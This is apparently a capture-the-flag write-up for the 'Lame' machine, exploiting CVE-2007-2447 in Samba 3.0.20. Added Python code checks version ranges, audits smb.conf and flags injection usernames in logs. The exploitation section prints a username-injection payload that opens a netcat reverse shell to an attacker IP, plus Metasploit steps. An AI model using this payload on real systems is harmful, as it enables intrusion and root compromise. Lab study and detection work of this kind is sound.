Lame
Summary
Lame is an easy-difficulty Linux machine that demonstrates the risk of running outdated network services. The box exposes a vulnerable Samba service that allows remote code execution, which gives the initial foothold. No separate privilege escalation step is needed, because the exploit yields a shell that is already running as root.
Reconnaissance
Nmap Scan
First, let’s start with a comprehensive nmap scan to identify open ports and services:
nmap -sC -sV -oA lame 10.10.10.3
Results:
- Port 21/tcp - FTP (vsftpd 2.3.4)
- Port 22/tcp - SSH (OpenSSH 4.7p1)
- Port 139/tcp - NetBIOS session service
- Port 445/tcp - Samba (3.0.20-Debian)
The Samba version 3.0.20 immediately stands out as potentially vulnerable.
Vulnerability Assessment
Samba 3.0.20 - Remote Code Execution
A quick search reveals that Samba 3.0.20 is vulnerable to CVE-2007-2447. When the username map script option is enabled in smb.conf, smbd passes the client-supplied username to /bin/sh without escaping it, so shell metacharacters in the username allow remote attackers to execute arbitrary commands.
This vulnerability affects Samba versions 3.0.0 through 3.0.25rc3.
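To make the version-range claim above checkable rather than eyeballed, here is an added example (not part of the original writeup) that parses nmap -oN style service lines and flags any Samba banner that falls inside the affected range 3.0.0 through 3.0.25rc3. The sample scan text is constructed to match the ports and versions the writeup reports; the nmap file name, the log format details and the helper names are assumptions. Release candidates are ordered below the final release with the same number, so 3.0.25rc3 is flagged while 3.0.25 and 3.0.25rc4 are not.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample in the style of nmap -oN output for the four ports the
# writeup lists (not the real lame.nmap file; version strings match the page).
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Affected range as stated in the writeup: Samba 3.0.0 through 3.0.25rc3 inclusive.
AFFECTED_LOW, AFFECTED_HIGH = "3.0.0", "3.0.25rc3"

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

VersionKey = Tuple[int, int, int, int, int]


def version_key(text: str) -> VersionKey:
    """Sortable key for 'X.Y.Z' or 'X.Y.ZrcN'.

    A release candidate must sort below the final release with the same number,
    so the key is (major, minor, patch, 0, N) for rcN and (major, minor, patch, 1, 0)
    for a final release. Trailing vendor suffixes such as '-Debian' are ignored.
    """
    m = VERSION.match(text)
    if m is None:
        raise ValueError(f"unparseable version: {text!r}")
    major, minor, patch, rc = m.groups()
    if rc is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(rc))


def in_affected_range(version: str) -> bool:
    """True when the version lies inside the CVE-2007-2447 range (inclusive)."""
    return version_key(AFFECTED_LOW) <= version_key(version) <= version_key(AFFECTED_HIGH)


def samba_version_from_banner(banner: str) -> Optional[str]:
    """Extract 'X.Y.Z[rcN]' from a 'Samba smbd ...' banner; None for ranges like '3.X - 4.X'."""
    m = re.search(r"Samba smbd (\d+\.\d+\.\d+(?:rc\d+)?)", banner)
    return m.group(1) if m else None


def find_vulnerable_samba(nmap_output: str) -> List[Tuple[int, str]]:
    """Return (port, version) for every open port whose Samba banner is in the affected range."""
    findings = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line)
        if m is None:
            continue
        port, _service, banner = m.groups()
        version = samba_version_from_banner(banner)
        if version is not None and in_affected_range(version):
            findings.append((int(port), version))
    return findings


if __name__ == "__main__":
    for port, version in find_vulnerable_samba(SAMPLE_NMAP_OUTPUT):
        print(f"port {port}: Samba {version} is within the CVE-2007-2447 range")
```

The banner on port 139 only gives the coarse "3.X - 4.X" range, so it is skipped rather than guessed; only the precise banner on 445 produces a finding. The same key function works for any other product whose advisory gives an inclusive version range with release candidates.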
Exploitation
Method 1: Manual Exploitation
We can exploit this manually by crafting a malicious username:
smbclient //10.10.10.3/tmp -U "/=`nohup nc -e /bin/sh 10.10.14.5 4444`"
Before running that command, set up a listener on your attacking machine to catch the reverse shell:
nc -lvnp 4444
Method 2: Metasploit
Alternatively, we can use Metasploit’s exploit module:
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.5
exploit
Success! We get a shell as root directly: smbd itself runs as root, so the injected command inherits its privileges.
Post-Exploitation
Since the exploit provides root access immediately, we can simply retrieve both flags:
User Flag
cat /home/makis/user.txt
Root Flag
cat /root/root.txt
Lessons Learned
- Keep Services Updated: Running outdated versions of critical services like Samba can lead to trivial exploitation
- Input Validation: The vulnerability exists because the username is handed to a shell without any sanitization
- Principle of Least Privilege: Services should not run with root privileges unless absolutely necessary; here, a bug in a service that runs as root becomes a full system compromise
Mitigation
- Update Samba to a supported, patched version
- Do not pass client-supplied input to a shell; in particular, avoid the username map script option that this bug abuses
- Use security tools like fail2ban to detect and block repeated exploitation attempts
- Conduct regular security audits and penetration tests
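The two mitigation points about input handling and fail2ban-style detection can be exercised together. The following added example (not code from the original writeup) audits an smb.conf excerpt for the username map script option and scans authentication events for usernames containing shell metacharacters, the pattern CVE-2007-2447 relies on. Both the configuration excerpts and the log lines are constructed: the log lines are a generic SIEM-style normalized format, not real smbd log output, and the injection attempt uses the writeup's backtick pattern with a harmless command. The function names, the field names (user=, src=) and the blocking threshold are assumptions. One caveat a practitioner would want is built in: Windows machine accounts legitimately end in a single "$", so a trailing "$" alone is not treated as suspicious.

```python
import re
from collections import Counter
from typing import List, Tuple

# Constructed smb.conf excerpts (illustrative, not the machine's real config):
# the first enables the option whose unescaped shell invocation CVE-2007-2447
# abuses, the second leaves it out.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /usr/local/bin/mapuser.sh
"""

SAFE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
"""

# Constructed, SIEM-style normalized authentication events (not real smbd log
# format): a benign login, a machine-account login, an injection attempt using
# the backtick pattern from the writeup (with a harmless command), and an
# ordinary failed login.
SAMPLE_AUTH_LOG = """\
2024-05-01T10:00:01Z host=fileserver service=smbd event=session_setup user="makis" src=10.10.14.20 result=ok
2024-05-01T10:00:04Z host=fileserver service=smbd event=session_setup user="WORKSTATION1$" src=10.10.14.22 result=ok
2024-05-01T10:00:07Z host=fileserver service=smbd event=session_setup user="/=`id`" src=10.10.14.5 result=failed
2024-05-01T10:00:09Z host=fileserver service=smbd event=session_setup user="j.doe" src=10.10.14.21 result=failed
"""

# Characters with shell meaning that no legitimate SMB username needs.
SHELL_META = re.compile(r"[`$;|&<>(){}\n]")
EVENT = re.compile(r'user="([^"]*)"\s+src=(\S+)')


def is_suspicious_username(user: str) -> bool:
    """True when the username carries shell metacharacters (the CVE-2007-2447 pattern).

    A single trailing '$' is allowed because machine accounts are named that way.
    """
    core = user[:-1] if user.endswith("$") else user
    return SHELL_META.search(core) is not None


def suspicious_attempts(log_text: str) -> List[Tuple[str, str]]:
    """Return (src, username) for every event whose username looks like injection."""
    hits = []
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if m is None:
            continue
        user, src = m.groups()
        if is_suspicious_username(user):
            hits.append((src, user))
    return hits


def sources_to_block(log_text: str, threshold: int = 1) -> List[str]:
    """fail2ban-style policy: sources with at least `threshold` injection attempts."""
    counts = Counter(src for src, _ in suspicious_attempts(log_text))
    return sorted(src for src, n in counts.items() if n >= threshold)


def audit_smb_conf(conf: str) -> List[str]:
    """Flag the 'username map script' option, which hands the username to a shell."""
    findings = []
    for lineno, raw in enumerate(conf.splitlines(), start=1):
        line = raw.strip()
        if not line or line[0] in "#;[":
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "username map script":
            findings.append(
                f"line {lineno}: 'username map script = {value.strip()}' "
                "passes the client-supplied username to /bin/sh; remove it "
                "and upgrade Samba"
            )
    return findings


if __name__ == "__main__":
    print(suspicious_attempts(SAMPLE_AUTH_LOG))
    print(sources_to_block(SAMPLE_AUTH_LOG))
    for finding in audit_smb_conf(WEAK_SMB_CONF):
        print(finding)
```

A threshold of 1 is deliberate for this signature: a backtick or semicolon in a username is never a typo, so one hit is enough to act on, unlike password-guessing rules where a count over time is needed. The configuration audit is the cheaper control, since removing the option closes the shell code path regardless of what a client sends.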
Tools Used
- nmap
- Metasploit Framework
- netcat
- searchsploit